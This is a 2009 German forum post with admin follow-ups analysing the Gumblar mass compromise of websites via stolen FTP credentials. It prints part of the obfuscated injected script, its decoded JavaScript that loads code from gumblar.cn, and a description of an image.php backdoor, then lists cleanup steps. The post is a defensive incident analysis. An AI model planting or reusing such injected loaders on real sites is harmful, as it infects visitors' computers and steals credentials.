ftp-Hack und Injektion von gumblar.cn Fontgröße
db1sb schreibt um 12:15:33 am 12.05.2009 PM | antworten
Zur Zeit werden wieder viele gehostete Seiten mit Schadcode infiziert. Betroffen sind Seiten mit den Endungen html, js und index*.php sowie Verzeichnisse mit dem Namen "image".
 
Eingefügt wird Code von der Art
 
<!--
(function(){var RGzsR="%";var nvYzk="var`20`61`3d`22ScriptEngine`22`2cb`3d`22
... ape(Lvd6z);eval(pe6J)})();
 -->
 
decodiert ergibt das folgendes js-Coding:
 
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent; 
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)
&&(typeof(zrvzts)!=typeof("A")))
{ zrvzts="A"; eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;"); 
document.write("<script src=//gumblar.cn/rss/id="+j+">");

Es soll offensichtlich über den Link gumblar.cn/rss/id=2 und id=3 eine Browserlücke ausgenutzt werden, um den Rechner zu infizieren. Bei id=3 wird ein Flush File (gdcwh.swf) heruntergeladen, das wohl einen Exploit erzeugt. Bei id=2 wird der Acrobat Reader angegriffen.
 
In image-Verzeichnissen wird ein Backdoor-File "image.php" angelegt, das über einen Post mit dem Parameter "e" Schadcode zum Ausführen erhalten kann. Hiermit erhält der Angreifer die Möglichkeit, weitere Manipulationen an gehosteten Files vorzunehmen.
 
In verschiedenen Foren wird berichtet, dass auch nach Änderung des FTP-Passwords eine erneute Infektion der Sourcen auftritt. Ein Keylogger, der die Passwortänderung hätte weitergeben können, haben die Autoren auf ihrem Computer nicht gefunden. Es deutet alles darauf hin, dass nach der Infektion des Rechners FTP-Passwörter ausgespäht werden. Das geschieht so effektiv, dass auch Änderungen des Passworts nichts helfen, weil diese bei der nächsten FTP-Verbindung wieder an die Hacker übermittelt werden.
 

Versuche, das Problem zu beseitigen:

  • Zuerst eigenen Rechner säubern. Obwohl MalwareBytes und McAfee nichts finden, funktioniert z.B. "Start->Run Program: cmd" nicht. Das ist ein Zeichen, dass der Rechner von Malware gekapert ist. Einen geeigneten Wiederherstellungspunkt suchen und Rechner damit neu aufsetzen.
  • Nach dem Säubern der Files auf dem Webserver muss der FTP und SSH-Zugang deaktiviert werden. Dies geschieht über ein Browserfrontend, das der Hoster zur Verfügung stellt. 
  • Änderung des FTP-Passworts von einem anderen Rechner aus.
  • Wichtig: Keine Passwörter im FTP-Programm speichern, sondern bei jedem Connect neu eingeben. FTP-Zugang dazu nur kurz aktivieren. Der Trojaner liest vermutlich die Registry und übermittelt die Verbindungsdaten.
  • Domain täglich überwachen, ob ein erneuter Angriff stattgefunden hat. Momentan versucht gumblar, an möglichst viele FTP-Verbindungsdaten zu kommen.  Bei infizierten Rechnern wird das Cookie "miek=1" gesetzt.
  • Acrobat Reader auf Version 9.1.1 updaten!

Aktuelle Infos gibt es unter http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/comment-page-1/


Über die Absichten der Malware wird unter http://www.handelsblatt.com/technologie/it-internet/trojaner-faelscht-google-ergebnisse;2277404 spekuliert.


Weiter Links:


ADMIN schreibt um 15:55:09 am 19.05.2009 PM | antworten
Das Side-Script hat sich geändert. Inzwischen wird Martuz.cn als neuer Link verwendet. Zudem fragt es ab, ob es im Google Chrome Browser läuft und stellt sich dort tot. Viele Administratoren verwenden Google Chrom, um ihre Seiten zu überprüfen. Bisher hat er den Schädling gemeldet. Das soll offenbar verhindert werden.
ADMIN schreibt um 08:08:43 am 26.05.2009 PM | antworten
Eine detailierte Analyse der Schadfunktionen ist hier nachzulesen...
ADMIN schreibt um 12:08:46 am 03.06.2009 PM | antworten

Heise berichtet:

 

Der Sicherheitsdienstleister Websense hat nach eigenen Angaben Massenhacks von Webseiten beobachtet, bei denen Kriminelle eigene JavaScripte in die Seiten eingebettet haben. Besucher der Seiten werden laut Bericht auf eine Domain umgeleitet, die einen ähnlich klingenden Namen wie google-analytics.com hat...

Weiterlesen...

 





Beitrag kommentieren
markierte Stelle 'fett' schreiben markierte Stelle 'kursiv' schreiben markierte Stelle unterstreichen markierte Stelle als Böbbel-Liste formatieren markierte Stelle als numerierte Liste formatieren markierte Stelle herausrücken markierte Stelle einrücken Link einfügen Bild einfügen Undo Redo Bilder hochladen  Einloggen  Ausloggen  Registrieren
   
Seite bookmarken bei:
del.icio.us Mister Wong Folkd OneView Linkarena Google Yahoo MyWeb BlinkList Furl YiGG
 
[Impressum | Datenschutzerklärung]